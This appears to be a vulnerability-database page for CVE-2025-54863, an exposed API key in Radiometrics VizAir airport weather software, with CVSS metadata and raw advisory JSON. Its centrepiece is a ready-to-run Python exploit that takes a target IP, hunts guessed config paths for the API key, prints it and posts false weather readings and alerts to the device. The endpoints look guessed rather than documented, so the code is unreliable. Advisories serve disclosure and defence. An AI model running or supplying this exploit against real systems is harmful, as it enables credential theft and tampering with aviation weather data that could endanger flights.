Security Vulnerability Report
中文
CVE-2025-54863 CVSS 10.0 CRITICAL

CVE-2025-54863

Published: 2025-11-04 17:16:23
Last Modified: 2025-11-12 14:13:18
Source: [email protected]

Description

Radiometrics VizAir is vulnerable to exposure of the system's REST API key through a publicly accessible configuration file. This allows attackers to remotely alter weather data and configurations, automate attacks against multiple instances, and extract sensitive meteorological data, which could potentially compromise airport operations. Additionally, attackers could flood the system with false alerts, leading to a denial-of-service condition and significant disruption to airport operations. Unauthorized remote control over aviation weather monitoring and data manipulation could result in incorrect flight planning and hazardous takeoff and landing conditions.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:radiometrics:vizair:*:*:*:*:*:*:*:* - VULNERABLE
Radiometrics VizAir 所有版本(截至披露日期)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json import sys # CVE-2025-54863 PoC - Radiometrics VizAir API Key Exposure # Target: Radiometrics VizAir weather monitoring device def exploit_vizair(target_ip): """ Exploit for CVE-2025-54863: Radiometrics VizAir REST API key exposure This PoC demonstrates how an attacker can retrieve the API key from publicly accessible configuration file and gain unauthorized access. """ # Step 1: Try to access the exposed configuration file config_urls = [ f"http://{target_ip}/config/api_key.json", f"http://{target_ip}/api/config", f"http://{target_ip}/settings.json", f"http://{target_ip}/api/v1/settings" ] api_key = None for url in config_urls: try: response = requests.get(url, timeout=5) if response.status_code == 200: data = response.json() if 'api_key' in data: api_key = data['api_key'] print(f"[+] Found API Key at: {url}") print(f"[+] API Key: {api_key}") break except: continue if not api_key: print("[-] Could not retrieve API key from common config locations") return None # Step 2: Use the API key to access protected endpoints headers = { 'Authorization': f'Bearer {api_key}', 'Content-Type': 'application/json' } # Enumerate available endpoints print("\n[+] Enumerating protected API endpoints...") endpoints = [ '/api/v1/weather/current', '/api/v1/config', '/api/v1/alerts', '/api/v1/data/export' ] for endpoint in endpoints: try: resp = requests.get(f"http://{target_ip}{endpoint}", headers=headers, timeout=5) if resp.status_code == 200: print(f"[+] Accessible: {endpoint}") except: pass # Step 3: Demonstrate data manipulation capability print("\n[+] Attempting weather data manipulation...") manipulate_data = { 'temperature': 999.0, # False reading 'wind_speed': 999, 'alert': 'TSUNAMI_WARNING' # False alert } try: resp = requests.post(f"http://{target_ip}/api/v1/weather/update", headers=headers, json=manipulate_data) if resp.status_code == 200: print("[+] Successfully manipulated weather data!") print("[-] This could cause aviation safety incidents") except Exception as e: print(f"[-] Manipulation failed: {e}") return api_key if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] Starting CVE-2025-54863 exploit against {target}") exploit_vizair(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54863", "sourceIdentifier": "[email protected]", "published": "2025-11-04T17:16:22.967", "lastModified": "2025-11-12T14:13:17.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Radiometrics VizAir is vulnerable to exposure of the system's REST API key through a publicly accessible configuration file. This allows attackers to remotely alter weather data and configurations, automate attacks against multiple instances, and extract sensitive meteorological data, which could potentially compromise airport operations. Additionally, attackers could flood the system with false alerts, leading to a denial-of-service condition and significant disruption to airport operations. Unauthorized remote control over aviation weather monitoring and data manipulation could result in incorrect flight planning and hazardous takeoff and landing conditions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radiometrics:vizair:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-08", "matchCriteriaId": "C403D079-7E0F-420C-8312-90466CB0EF5B"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-04.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory", "US Government Resource"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.